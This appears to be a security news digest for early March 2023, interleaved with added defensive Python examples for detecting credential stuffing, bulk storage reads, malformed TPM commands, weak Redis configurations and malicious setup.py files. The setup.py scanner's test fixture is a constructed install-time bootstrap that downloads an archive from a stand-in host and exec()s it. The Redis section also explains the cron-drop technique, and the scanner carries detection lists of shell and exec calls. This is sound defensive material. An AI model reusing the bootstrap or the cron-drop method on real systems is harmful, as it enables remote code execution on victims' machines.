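    seen = defaultdict(set)   # (principal, bucket_index) -> {(bucket, object)}
    first_seen = {}
    for entry in entries:
        payload = entry.get("protoPayload", {})
        if payload.get("methodName") != "storage.objects.get":
            continue
        ts = _parse_ts(entry["timestamp"])
        principal = payload["authenticationInfo"]["principalEmail"]
        key = (principal, int(ts.timestamp() // window_seconds))
        seen[key].add(_split_resource(payload["resourceName"]))
        first_seen.setdefault(key, ts)

    flagged = {}
    for key, objects in seen.items():
        principal = key[0]
        if len(objects) < min_objects:
            continue
        current = flagged.get(principal)
        if current is None or len(objects) > current["distinct_objects"]:
            flagged[principal] = {
                "distinct_objects": len(objects),
                "buckets": sorted({b for b, _ in objects}),
                "window_start": first_seen[key].isoformat(),
            }
    return flagged


if __name__ == "__main__":
    for principal, info in flag_bulk_object_reads(SAMPLE_ENTRIES).items():
        print(principal, info)
```

The detector needs the Data Access audit log for Cloud Storage to be enabled on the project in the first place; it is off by default, and without it there are no `storage.objects.get` entries to count at all. Tune the window and threshold against a baseline of the principal's normal behaviour, since batch jobs legitimately read many objects.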
March 6, 2023 – Breach
Hatch Bank data breach caused by the exploitation of the GoAnywhere MFT zero-day Full Text
Abstract
Fintech platform Hatch Bank disclosed a data breach after hackers exploited a recently discovered zero-day in the Fortra GoAnywhere MFT secure file-sharing platform. Hatch Bank is a fintech firm that provides services to other fintech companies. The company...Security Affairs
March 6, 2023 – Malware
New Feature-Rich Post-Exploitation Tool ‘Exfiltrator-22’ Linked With LockBit Full Text
Abstract
A new post-exploitation framework, Exfiltrator-22 (EX-22), is being offered on underground marketplaces. According to the CYFIRMA team, LockBit 3.0 affiliates or its members are most probably behind its development. The developers have used the same C2 infrastructure previously exposed i ... Read MoreCyware
March 06, 2023 – Encryption
Experts Discover Flaw in U.S. Govt’s Chosen Quantum-Resistant Encryption Algorithm Full Text
Abstract
A group of researchers has revealed what it says is a vulnerability in a specific implementation of CRYSTALS-Kyber , one of the encryption algorithms chosen by the U.S. government as quantum-resistant last year. The exploit relates to "side-channel attacks on up to the fifth-order masked implementations of CRYSTALS-Kyber in ARM Cortex-M4 CPU," Elena Dubrova, Kalle Ngo, and Joel Gärtner of KTH Royal Institute of Technology said in a paper. CRYSTALS-Kyber is one of four post-quantum algorithms selected by the U.S. National Institute of Standards and Technology (NIST) after a rigorous multi-year effort to identify the next-generation encryption standards that can withstand huge leaps in computing power. A side-channel attack, as the name implies, involves extracting secrets from a cryptosystem through measurement and analysis of physical parameters. Some examples of such parameters include supply current, execution time, and electromagnetic emission. The underlying idThe Hacker News
March 6, 2023 – Malware
Colour-Blind, a fully featured info stealer and RAT in PyPI Full Text
Abstract
Experts discovered a fully featured information stealer, tracked as 'Colour-Blind' in the Python Package Index (PyPI). Researchers from Kroll's Cyber Threat Intelligence team discovered a malicious Python package uploaded to the Python Package Index...Security Affairs
March 6, 2023 – General
Vulnerabilities of years past haunt organizations, aid attackers Full Text
Abstract
According to a Tenable report, the number one group of most frequently exploited vulnerabilities represents a large pool of known vulnerabilities, some of which were originally disclosed as far back as 2017.Cyware
March 6, 2023 – Vulnerabilities
RIG EK Achieves Lifetime High Success Rate with Old IE Bugs Full Text
Abstract
RIG EK continues to make its mark as a successful exploit kit, attempting roughly 2,000 intrusions daily with a 30% success rate, the highest of its lifetime. By exploiting relatively old Internet Explorer vulnerabilities, the exploit kit has been seen distributing various types ... Read MoreCyware
March 6, 2023 – General
Tracking device technology: A double-edged sword for CISOs Full Text
Abstract
Tracking devices are a boon to organizations with vast logistical operations and anyone who has ever lost a set of car keys. But trackers can also be a nightmare for cybersecurity, opening up a whole new world of opportunity for intruders.Cyware
March 6, 2023 – General
Attackers are developing and deploying exploits faster than ever Full Text
Abstract
While there was a reduction in the widespread exploitation of new vulnerabilities in 2022, the risk remains significant as broad and opportunistic attacks continue to pose a threat, according to Rapid7.Cyware
March 6, 2023 – General
Municipal CISOs grapple with challenges as cyber threats soar Full Text
Abstract
Municipal CISOs grapple with challenges as they become targets for nation-state threat actors, cope with regulations, and pursue funding from resource-constrained governments.Cyware
March 5, 2023 – Attack
Credential Stuffing attack on Chick-fil-A impacted +71K users Full Text
Abstract
American fast-food restaurant chain Chick-fil-A reported that the accounts of over 71K users were compromised as a result of a credential stuffing campaign. The American fast-food restaurant chain Chick-fil-A notified over 71K users that their accounts...Security Affairs
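Credential stuffing leaves a distinctive trace in authentication logs: one source tries many different usernames in a short window, with a low but non-zero success rate from reused passwords. The detector below is an added example for this page, not Chick-fil-A's code or any vendor's product; the log format (timestamp, source IP, username, result) and the log lines themselves are constructed, and the window and threshold are tuning assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample authentication log (not from any real system):
# timestamp, source IP, username, result.
SAMPLE_AUTH_LOG = """\
2023-03-04T10:00:01Z 203.0.113.7 alice FAIL
2023-03-04T10:00:02Z 203.0.113.7 bob FAIL
2023-03-04T10:00:02Z 203.0.113.7 carol FAIL
2023-03-04T10:00:03Z 203.0.113.7 dave OK
2023-03-04T10:00:03Z 203.0.113.7 erin FAIL
2023-03-04T10:00:04Z 203.0.113.7 frank FAIL
2023-03-04T10:05:00Z 198.51.100.2 alice FAIL
2023-03-04T10:05:30Z 198.51.100.2 alice FAIL
2023-03-04T10:06:00Z 198.51.100.2 alice OK
"""


def parse_auth_line(line):
    ts, ip, user, result = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, result == "OK"


def find_stuffing_sources(log_text, window=timedelta(minutes=10), min_distinct_users=5):
    """Flag source IPs that try at least `min_distinct_users` different accounts
    within `window`. Returns {ip: {"distinct_users", "attempts", "successes"}}.

    Many users from one source is the stuffing signature. Many attempts against one
    user from one source is password guessing and is deliberately not flagged here.
    """
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            ts, ip, user, ok = parse_auth_line(line)
            by_ip[ip].append((ts, user, ok))

    flagged = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e[0])
        end = 0
        for start in range(len(events)):
            # advance the window end so events[start:end] all fall within `window`
            while end < len(events) and events[end][0] - events[start][0] <= window:
                end += 1
            span = events[start:end]
            users = {u for _, u, _ in span}
            if len(users) < min_distinct_users:
                continue
            previous = flagged.get(ip)
            if previous is None or len(users) > previous["distinct_users"]:
                flagged[ip] = {
                    "distinct_users": len(users),
                    "attempts": len(span),
                    # accounts that accepted a password from this source: reset these first
                    "successes": sorted({u for _, u, ok in span if ok}),
                }
    return flagged


if __name__ == "__main__":
    for ip, info in find_stuffing_sources(SAMPLE_AUTH_LOG).items():
        print(ip, info)
```

Real stuffing campaigns spread attempts across residential proxies, so a per-IP threshold alone misses them; the same logic applied per ASN, per device fingerprint, or per user-agent string catches more, and the `successes` list is the set of accounts to force through a password reset and MFA enrolment.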
March 5, 2023 – Breach
Play Ransomware gang has begun to leak data stolen from City of Oakland Full Text
Abstract
The Play ransomware gang has finally begun to leak the data stolen from the City of Oakland in a recent attack. The Play ransomware gang has begun to leak data they have stolen from the City of Oakland (California) in a recent cyberattack. Oakland...Security Affairs
March 4, 2023 – Breach
Thousands of Websites Hijacked Using Compromised FTP Credentials Full Text
Abstract
In many cases, the attackers managed to obtain highly secure auto-generated FTP credentials and used them to hijack the victim websites to redirect visitors to adult-themed content.Cyware
March 04, 2023 – General
Security and IT Teams No Longer Need To Pay For SaaS-Shadow IT Discovery Full Text
Abstract
This past January, a SaaS Security Posture Management (SSPM) company named Wing Security (Wing) made waves with the launch of its free SaaS-Shadow IT discovery solution . Cloud-based companies were invited to gain insight into their employees' SaaS usage through a completely free, self-service product that operates on a "freemium" model. If a user is impressed with the solution and wants to gain more insights or take remediation action, they can purchase the enterprise solution. "In today's economic reality, security budgets have not necessarily been cut down, but buyers are far more careful in their purchasing decisions and rightfully so. We believe that you cannot secure what you do not know, so knowing should be a basic commodity. Once you understand the magnitude of your SaaS attack layer, you can make an educated decision as to how you are going to solve it. Discovery is the natural and basic first step and it should be accessible to anyone." said GaThe Hacker News
March 4, 2023 – Attack
Southeastern Louisiana University ‘Likely’ Suffered Cyber Attack Full Text
Abstract
Southeastern Louisiana University suffered a week-long outage of its website, email, and assignment-submission system after a "potential incident" last week caused the university to shut down its network.Cyware
March 04, 2023 – Malware
New FiXS ATM Malware Targeting Mexican Banks Full Text
Abstract
A new ATM malware strain dubbed FiXS has been observed targeting Mexican banks since the start of February 2023. "The ATM malware is hidden inside another not-malicious-looking program," Latin American cybersecurity firm Metabase Q said in a report shared with The Hacker News. Besides requiring interaction via an external keyboard, the Windows-based ATM malware is also vendor-agnostic and is capable of infecting any teller machine that supports CEN/XFS (short for eXtensions for Financial Services). The exact mode of compromise remains unknown but Metabase Q's Dan Regalado told The Hacker News that it's likely that "attackers found a way to interact with the ATM via touchscreen." FiXS is also said to be similar to another strain of ATM malware codenamed Ploutus that has enabled cybercriminals to extract cash from ATMs by using an external keyboard or by sending an SMS message . One of the notable characteristics of FiXS is its ability to dispThe Hacker News
March 4, 2023 – Government
The U.S. CISA and FBI warn of Royal ransomware operation Full Text
Abstract
The FBI and CISA released a joint Cybersecurity Advisory to provide organizations with the tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with this ransomware family.Cyware
March 4, 2023 – General
Security Affairs newsletter Round 409 by Pierluigi Paganini Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here. FiXS,...Security Affairs
March 4, 2023 – Malware
FiXS, a new ATM malware that is targeting Mexican banks Full Text
Abstract
Researchers at Metabase Q discovered a new ATM malware, dubbed FiXS, that was employed in attacks against Mexican banks since February 2023. Researchers at Metabase Q recently spotted a new ATM malware, dubbed FiXS, that is currently targeting Mexican...Security Affairs
March 4, 2023 – Breach
BidenCash leaks 2.1M stolen credit/debit cards Full Text
Abstract
The dark web carding site BidenCash recently leaked for free a collection of approximately 2 million stolen payment card numbers. An archive containing 2.1 million stolen payment card numbers is available for free to commemorate the anniversary of the dark...Security Affairs
March 3, 2023 – Government
CISA Releases Decider Tool to Help with MITRE ATT&CK Mapping Full Text
Abstract
Decider makes the mapping process easier by asking the user a series of questions about the adversary’s activity in their network. The tool also provides search and filtering functionality, and allows users to export the results to common formats.Cyware
March 03, 2023 – Vulnerabilities
New Flaws in TPM 2.0 Library Pose Threat to Billions of IoT and Enterprise Devices Full Text
Abstract
A pair of serious security defects has been disclosed in the Trusted Platform Module ( TPM ) 2.0 reference library specification that could potentially lead to information disclosure or privilege escalation. One of the vulnerabilities, CVE-2023-1017 , concerns an out-of-bounds write, while the other, CVE-2023-1018 , is described as an out-of-bounds read. Credited with discovering and reporting the issues in November 2022 is cybersecurity company Quarkslab. "These vulnerabilities can be triggered from user-mode applications by sending malicious commands to a TPM 2.0 whose firmware is based on an affected TCG reference implementation," the Trusted Computing Group (TCG) said in an advisory. Large tech vendors, organizations using enterprise computers, servers, IoT devices, and embedded systems that include a TPM can be impacted by the flaws, Quarkslab noted , adding they "could affect billions of devices." TPM is a hardware-based solution (i.e., a crypto-proThe Hacker News
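Both TCG advisories describe the same bug class: a length field inside a command sent by an unprivileged caller is trusted before it is compared with the bytes actually received, so the reference code reads or writes past the end of its buffer. The parser below is an added example for this page, not the TCG reference implementation and not Quarkslab's proof of concept; it keeps the real TPM 2.0 wire layout for the 10-byte command header (big-endian tag, commandSize, commandCode) and for a TPM2B (16-bit size plus bytes), but assumes, for illustration only, a command body made of TPM2B parameters with no handle or session areas, and uses a placeholder command code rather than a real TPM2_CC value.

```python
import struct

TPM_ST_NO_SESSIONS = 0x8001
TPM_ST_SESSIONS = 0x8002
HEADER = struct.Struct(">HII")      # tag (UINT16), commandSize (UINT32), commandCode (UINT32)
EXAMPLE_COMMAND_CODE = 0x00000123   # placeholder for illustration, not a real TPM2_CC


class TpmParseError(ValueError):
    pass


def parse_tpm2b(buf, offset):
    """Parse one TPM2B (UINT16 size + `size` bytes) at `offset`.

    The size field is attacker-controlled; it must be checked against the bytes
    actually received before anything is read or copied.
    """
    if offset + 2 > len(buf):
        raise TpmParseError("truncated TPM2B size field")
    (size,) = struct.unpack_from(">H", buf, offset)
    end = offset + 2 + size
    if end > len(buf):
        raise TpmParseError(f"TPM2B size {size} exceeds the {len(buf) - offset - 2} bytes remaining")
    return bytes(buf[offset + 2:end]), end


def parse_command(buf):
    """Parse a header followed by a sequence of TPM2B parameters.

    Assumption for the example: no handle or session areas; real commands carry both.
    """
    if len(buf) < HEADER.size:
        raise TpmParseError("command shorter than the 10-byte header")
    tag, command_size, command_code = HEADER.unpack_from(buf, 0)
    if tag not in (TPM_ST_NO_SESSIONS, TPM_ST_SESSIONS):
        raise TpmParseError(f"unexpected tag 0x{tag:04x}")
    if command_size != len(buf):
        raise TpmParseError(f"commandSize {command_size} != received length {len(buf)}")
    params = []
    offset = HEADER.size
    while offset < len(buf):
        blob, offset = parse_tpm2b(buf, offset)
        params.append(blob)
    return {"tag": tag, "commandCode": command_code, "params": params}


def build_command(tag, command_code, params):
    body = b"".join(struct.pack(">H", len(p)) + p for p in params)
    return HEADER.pack(tag, HEADER.size + len(body), command_code) + body


def command_is_rejected(buf):
    try:
        parse_command(buf)
    except TpmParseError:
        return True
    return False


# Constructed inputs: a well-formed command, and the same bytes with the first TPM2B
# size inflated to 0xFFFF while commandSize still matches the real length.
GOOD_COMMAND = build_command(TPM_ST_NO_SESSIONS, EXAMPLE_COMMAND_CODE, [b"hello", b"world!"])
BAD_COMMAND = GOOD_COMMAND[:HEADER.size] + struct.pack(">H", 0xFFFF) + GOOD_COMMAND[HEADER.size + 2:]

if __name__ == "__main__":
    print(parse_command(GOOD_COMMAND))
    print("malformed command rejected:", command_is_rejected(BAD_COMMAND))
```

The point of `BAD_COMMAND` is that the outer `commandSize` check passes; only the inner check in `parse_tpm2b` stops the 65535-byte size from driving a read or copy beyond the 25 bytes that arrived. Every nested length field needs its own comparison against the remaining input, which is the check the affected reference code lacked.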
March 3, 2023 – General
Cybersecurity’s Third Rail: Software Liability Full Text
Abstract
The Biden administration’s cybersecurity strategy calls for placing responsibility for buggy software on those best positioned to reduce risk. It’s high time, but it won’t be easy.Lawfare
March 3, 2023 – Privacy
Pegasus spyware used to spy on a Polish mayor Full Text
Abstract
The phone of an opposition-linked Polish mayor was infected with the powerful Pegasus spyware, local media reported. Reuters reported that the phone of an opposition-linked Polish mayor was infected with the Pegasus spyware. According to rumors, the Polish...Security Affairs
March 3, 2023 – Breach
Vice Society publishes data stolen during Vesuvius ransomware attack Full Text
Abstract
The Vice Society ransomware gang has published on the dark web files that it stole from Vesuvius, one month after the company announced that it had suffered a “cyber incident.”Cyware
March 03, 2023 – Hacker
Chinese Hackers Targeting European Entities with New MQsTTang Backdoor Full Text
Abstract
The China-aligned Mustang Panda actor has been observed using a hitherto unseen custom backdoor called MQsTTang as part of an ongoing social engineering campaign that commenced in January 2023. "Unlike most of the group's malware, MQsTTang doesn't seem to be based on existing families or publicly available projects," ESET researcher Alexandre Côté Cyr said in a new report. Attack chains orchestrated by the group have stepped up targeting of European entities in the wake of Russia's full-scale invasion of Ukraine last year. The victimology of the current activity is unclear, but the Slovak cybersecurity company said the decoy filenames are in line with the group's previous campaigns that target European political organizations. That said, ESET also observed attacks against unknown entities in Bulgaria and Australia, as well as a governmental institution in Taiwan, indicating focus on Europe and Asia. Mustang Panda has a history of using a remoteThe Hacker News
March 3, 2023 – Government
The Biden-Harris Administration Releases New National Cybersecurity Strategy Full Text
Abstract
The long-awaited National Cybersecurity Strategy seeks to make fundamental changes to underlying dynamics of the digital ecosystem.Lawfare
March 3, 2023 – Attack
Hundreds of thousands of websites hacked as part of redirection campaign Full Text
Abstract
Researchers reported that threat actors compromised thousands of websites using legitimate FTP credentials to hijack traffic. Cybersecurity firm Wiz reported that since early September...Security Affairs
March 3, 2023 – Malware
Mustang Panda’s Latest ‘MQsTTang’ Backdoor Treads New Ground With Qt and MQTT Full Text
Abstract
This backdoor is part of an ongoing campaign that researchers can trace back to early January 2023. Unlike most of the group’s malware, MQsTTang doesn’t seem to be based on existing families or publicly available projects.Cyware
March 03, 2023 – Government
U.S. Cybersecurity Agency Raises Alarm Over Royal Ransomware’s Deadly Capabilities Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released a new advisory about Royal ransomware , which emerged in the threat landscape last year. "After gaining access to victims' networks, Royal actors disable antivirus software and exfiltrate large amounts of data before ultimately deploying the ransomware and encrypting the systems," CISA said . The custom ransomware program , which has targeted U.S. and international organizations since September 2022, is believed to have evolved from earlier iterations that were dubbed Zeon. What's more, it's said to be operated by seasoned threat actors who used to be part of Conti Team One, cybersecurity company Trend Micro disclosed in December 2022. The ransomware group employs callback phishing as a means of delivering their ransomware to victims, a technique widely adopted by criminal groups that splintered from the Conti enterprise last year following its shutdown. Other modes ofThe Hacker News
March 3, 2023 – APT
MQsTTang, a new backdoor used by Mustang Panda APT against European entities Full Text
Abstract
China-Linked Mustang Panda APT employed MQsTTang backdoor as part of an ongoing campaign targeting European entities. China-linked Mustang Panda APT group has been observed using a new backdoor, called MQsTTang, in attacks aimed at European...Security Affairs
March 3, 2023 – Attack
Poland Blames Russian Hackers for Cyberattack on Tax Service Website Full Text
Abstract
The distributed denial-of-service (DDoS) attack occurred on Tuesday, causing the website to crash for approximately one hour and blocking users’ access to the online tax filing system.Cyware
March 3, 2023 – Vulnerabilities
Trusted Platform Module (TPM) 2.0 flaws could impact billions of devices Full Text
Abstract
Two vulnerabilities affecting the Trusted Platform Module (TPM) 2.0 library could potentially lead to information disclosure or privilege escalation. The Trusted Computing Group (TCG) is warning of two vulnerabilities affecting the implementations...Security Affairs
March 3, 2023 – Policy and Law
US Cybersecurity Strategy Shifts Liability Issues to Vendors Full Text
Abstract
A new federal strategy to make manufacturers liable for insecure software requires an attainable safe harbor policy and could be a disincentive for them in sharing important vulnerability info with the government, according to industry observers.Cyware
March 3, 2023 – Government
The U.S. CISA and FBI warn of Royal ransomware operation Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of the capabilities of the recently emerged Royal ransomware. The human-operated Royal ransomware first appeared on the threat landscape in September 2022, it has demanded...Security Affairs
March 3, 2023 – Attack
Cryptojacking Campaign Targets Insecure Deployments of Redis Servers Full Text
Abstract
Cado Labs researchers recently discovered a new cryptojacking campaign targeting insecure deployments of Redis database servers. Threat actors behind this campaign used the free and open source command line file transfer service transfer.sh.Cyware
March 3, 2023 – Breach
Retailer WH Smith discloses data breach after a cyberattack Full Text
Abstract
Retailer WH Smith disclosed a data breach following a cyber attack in which threat actors had access to company data. Retailer WH Smith revealed that threat actors have breached its infrastructure and had access to the data of about 12,500 current...Security Affairs
March 3, 2023 – Policy and Law
Nigerian Citizen Gets 11-Year US Federal Sentence for Global BEC Scam Full Text
Abstract
A leader of an international crime network that attempted to launder more than $25 million in fraudulently obtained funds, including through business email compromise, received a sentence of more than a decade in prison.Cyware
March 3, 2023 – Breach
Information of European Hotel Chain’s Customers Found on Unprotected Elasticsearch Server Full Text
Abstract
An analysis conducted by researcher Anurag Sen at CloudDefense.AI showed that the exposed Falkensteiner customer data was associated with Gustaffo, a company offering IT solutions for the hospitality industry.Cyware
March 2, 2023 – Breach
BidenCash Market Leaks Two Million Credit Cards in Birthday Blitz Full Text
Abstract
The one-year-old leaked dataset contains card information from all over the world, with a significant number of them issued in the United States, China, Mexico, India, Canada, and the UK.Cyware
March 02, 2023 – Hacker
Hackers Exploit Containerized Environments to Steal Proprietary Data and Software Full Text
Abstract
A sophisticated attack campaign dubbed SCARLETEEL is targeting containerized environments to perpetrate theft of proprietary data and software. "The attacker exploited a containerized workload and then leveraged it to perform privilege escalation into an AWS account in order to steal proprietary software and credentials," Sysdig said in a new report. The advanced cloud attack also entailed the deployment of crypto miner software, which the cybersecurity company said is either an attempt to generate illicit profits or a ploy to distract defenders and throw them off the trail. The initial infection vector banked on exploiting a vulnerable public-facing service in a self-managed Kubernetes cluster hosted on Amazon Web Services (AWS). Upon gaining a successful foothold, an XMRig crypto miner was launched and a bash script was used to obtain credentials that could be used to further burrow into the AWS cloud infrastructure and exfiltrate sensitive data. "Either cryThe Hacker News
March 2, 2023 – Government
White House Releases National Cybersecurity Strategy Full Text
Abstract
The strategy is designed to address cyber threats while also working to increase pathways for digital innovation.Lawfare
March 2, 2023 – Breach
GunAuction site was hacked and data of 565k accounts were exposed Full Text
Abstract
Hackers compromised the website GunAuction.com, a website that allows people to buy and sell guns, and stole users' data. Hackers have compromised GunAuction.com, a website that allows people to buy and sell guns, TechCrunch reported. The attackers...Security Affairs
March 2, 2023 – Breach
Canadian book giant says employee data was stolen during ransomware attack Full Text
Abstract
In an undated followup FAQ, Indigo now says employee data was involved in the attack. The Toronto-based company did not respond to requests for comment about how many people were affected.Cyware
March 02, 2023 – Cryptocurrency
New Cryptojacking Campaign Leverages Misconfigured Redis Database Servers Full Text
Abstract
Misconfigured Redis database servers are the target of a novel cryptojacking campaign that leverages a legitimate and open source command-line file transfer service to implement its attack. "Underpinning this campaign was the use of transfer[.]sh," Cado Security said in a report shared with The Hacker News. "It's possible that it's an attempt at evading detections based on other common code hosting domains (such as pastebin[.]com)." The cloud cybersecurity firm said the command line interactivity associated with transfer[.]sh has made it an ideal tool for hosting and delivering malicious payloads. The attack chain commences with targeting insecure Redis deployments, followed by registering a cron job that leads to arbitrary code execution when parsed by the scheduler. The job is designed to retrieve a payload hosted at transfer[.]sh. It's worth noting that similar attack mechanisms have been employed by other threat actors like TeamTNT andThe Hacker News
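The campaign above (and the Cado Labs item at March 3) needs nothing more than a Redis instance that answers unauthenticated commands from the internet; the usual mechanism for turning that into a cron job, general knowledge rather than a detail the reports give, is CONFIG SET of `dir` and `dbfilename` to a crontab path followed by SAVE of a key whose value is a crontab line. The audit below is an added example for this page, not Cado's tooling or anything from the Redis project; it checks a `redis.conf` text for the four settings that close that path, with a constructed weak configuration beside a hardened one (the `requirepass` value is a placeholder to replace with a real secret).

```python
from collections import defaultdict

# Constructed example of an exposed Redis configuration (not a real deployment).
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

# The same service with the settings that close off the cron-drop path.
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass replace-with-a-long-random-secret
rename-command CONFIG ""
rename-command DEBUG ""
dir /var/lib/redis
"""


def parse_redis_conf(text):
    """Map each directive to the list of argument strings seen (the last one wins in Redis)."""
    directives = defaultdict(list)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, args = line.partition(" ")
        directives[key.lower()].append(args.strip())
    return directives


def audit_redis_conf(text):
    """Return a list of findings; an empty list means none of the checked weaknesses is present."""
    conf = parse_redis_conf(text)
    findings = []

    # 1. Listening address: no bind directive means all interfaces.
    binds = conf.get("bind", [])
    wildcard = {"0.0.0.0", "*", "::"}
    if not binds or any(addr in wildcard for spec in binds for addr in spec.split()):
        findings.append("reachable on all interfaces: set 'bind 127.0.0.1 -::1' or a private address")

    # 2. protected-mode refuses non-loopback clients when no password is configured.
    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode is off: unauthenticated clients may connect from other hosts")

    # 3. Without requirepass any client that reaches the port can run any command.
    if not conf.get("requirepass") or not conf["requirepass"][-1]:
        findings.append("no requirepass: anyone who can reach the port can run any command")

    # 4. CONFIG SET dir/dbfilename is what lets a client write a crontab via SAVE.
    renamed = {args.split()[0].upper() for args in conf.get("rename-command", []) if args.split()}
    if "CONFIG" not in renamed:
        findings.append("CONFIG not disabled: 'rename-command CONFIG \"\"' blocks the dir/dbfilename write trick")

    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf) or "no findings")
```

On Redis 7 the `rename-command` approach still works but ACLs (`acl setuser` with `-config`) are the cleaner way to remove CONFIG from untrusted users; either way, the instance should sit behind a firewall rule as well, since a cron payload fetched from a file-sharing service like transfer.sh runs as whatever user Redis runs as.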
March 2, 2023 – Attack
Cryptojacking campaign targets insecure deployments of Redis servers Full Text
Abstract
Researchers from Cado Security discovered a cryptojacking campaign targeting misconfigured Redis database servers. Cado Labs researchers recently discovered a new cryptojacking campaign targeting insecure deployments of Redis database servers. Threat...Security Affairs
March 2, 2023 – Attack
Pierce Transit and City of Lakewood Investigating Potential Ransomware Attacks Full Text
Abstract
A Pierce Transit spokesperson told KOMO News in a statement that on Feb. 14, the agency "experienced a ransomware incident that temporarily disrupted some agency systems.Cyware
March 02, 2023 – Vulnerabilities
2023 Browser Security Report Uncovers Major Browsing Risks and Blind Spots Full Text
Abstract
As a primary working interface, the browser plays a significant role in today's corporate environment. The browser is constantly used by employees to access websites, SaaS applications and internal applications, from both managed and unmanaged devices. A new report published by LayerX, a browser security vendor, finds that attackers are exploiting this reality and are targeting it in increasing numbers ( download report here ). The key report findings Over half of all the browsers in the enterprise environment are misconfigured. While a properly configured browser is far harder to compromise, stealing data from misconfigured browsers is like taking candy from a baby. The leading misconfigurations are improper use of personal browser profiles on work devices (29%), poor patching routine (50%), and the use of corporate browser profiles on unmanaged devices. 3 of every 10 SaaS applications are non-corporate shadow SaaS, and no SaaS discovery/security solution can address its risThe Hacker News
March 2, 2023 – Vulnerabilities
Cisco fixed a critical command injection bug in IP Phone Series Full Text
Abstract
Cisco addressed a critical vulnerability, tracked as CVE-2023-20078, impacting its IP Phone 6800, 7800, 7900, and 8800 Series products. Cisco released security updates to address a critical flaw impacting its IP Phone 6800, 7800, 7900, and 8800...Security Affairs
March 2, 2023 – Hacker
Blackfly: Espionage Group Targets Materials Technology Full Text
Abstract
The Blackfly espionage group (aka APT41, Winnti Group, Bronze Atlas) has continued to mount attacks against targets in Asia and recently targeted two subsidiaries of an Asian conglomerate, likely attempting to steal intellectual property.Cyware
March 02, 2023 – Malware
Experts Identify Fully-Featured Info Stealer and Trojan in Python Package on PyPI Full Text
Abstract
A malicious Python package uploaded to the Python Package Index (PyPI) has been found to contain a fully-featured information stealer and remote access trojan. The package, named colourfool , was identified by Kroll's Cyber Threat Intelligence team, with the company calling the malware Colour-Blind . "The 'Colour-Blind' malware points to the democratization of cybercrime that could lead to an intensified threat landscape, as multiple variants can be spawned from code sourced from others," Kroll researchers Dave Truman and George Glass said in a report shared with The Hacker News. colourfool, like other rogue Python modules discovered in recent months, conceals its malicious code in the setup script, which points to a ZIP archive payload hosted on Discord. The file contains a Python script (code.py) that comes with different modules designed to log keystrokes, steal cookies, and even disable security software. The malware, besides performing defense evThe Hacker News
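The pattern Kroll describes, a `setup.py` that fetches an archive and executes a script from it at install time, is detectable statically because a legitimate setup script has no reason to open network connections or call `exec()`. The scanner below is an added example for this page, not Kroll's analysis code and not the `colourfool` package itself; the two `setup.py` texts it is run against are constructed (the download URL is a reserved `.invalid` name, not the real Discord-hosted payload), and the lists of suspicious modules and calls are a starting heuristic, not an exhaustive rule set.

```python
import ast
import re

NETWORK_MODULES = {"urllib", "requests", "http", "socket", "httpx", "aiohttp"}
EXEC_CALLS = {"exec", "eval", "compile", "__import__"}
SHELL_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.Popen",
               "subprocess.call", "subprocess.check_output"}
DECODE_CALLS = {"base64.b64decode", "zlib.decompress", "marshal.loads"}
URL_RE = re.compile(r"https?://[^\s'\"]+")

# Constructed setup.py modelled on the pattern described above: a bootstrap that
# downloads an archive and exec()s a script from it. Not the real package.
SUSPICIOUS_SETUP = '''\
from setuptools import setup
import io, os, zipfile
import urllib.request

def _bootstrap():
    data = urllib.request.urlopen("https://cdn.example.invalid/payload.zip").read()
    zipfile.ZipFile(io.BytesIO(data)).extractall(os.path.expanduser("~"))
    exec(open(os.path.expanduser("~/code.py")).read())

_bootstrap()
setup(name="colourful-example", version="0.0.1")
'''

# Constructed benign setup.py: a project URL in setup() metadata is normal and must not alert.
BENIGN_SETUP = '''\
from setuptools import setup
setup(name="harmless-example", version="1.0", url="https://example.invalid/harmless")
'''


def _dotted_name(node):
    """Return 'a.b.c' for Name/Attribute chains, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source):
    """Return a list of findings for behaviour a setup script has no business having."""
    tree = ast.parse(source)
    findings = []

    # String constants passed as setup(...) keyword values are metadata, not payload locations.
    metadata_nodes = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _dotted_name(node.func) == "setup":
            metadata_nodes.update(id(kw.value) for kw in node.keywords)

    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_MODULES:
                    findings.append(f"network import: {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            module = node.module or ""
            if module.split(".")[0] in NETWORK_MODULES:
                findings.append(f"network import: from {module}")
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in EXEC_CALLS:
                findings.append(f"dynamic code execution: {name}()")
            elif name in SHELL_CALLS:
                findings.append(f"shell execution: {name}()")
            elif name in DECODE_CALLS:
                findings.append(f"payload decoding: {name}()")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str) \
                and id(node) not in metadata_nodes:
            for url in URL_RE.findall(node.value):
                findings.append(f"embedded URL: {url}")
    return findings


if __name__ == "__main__":
    print("suspicious:", scan_setup_py(SUSPICIOUS_SETUP))
    print("benign:", scan_setup_py(BENIGN_SETUP))
```

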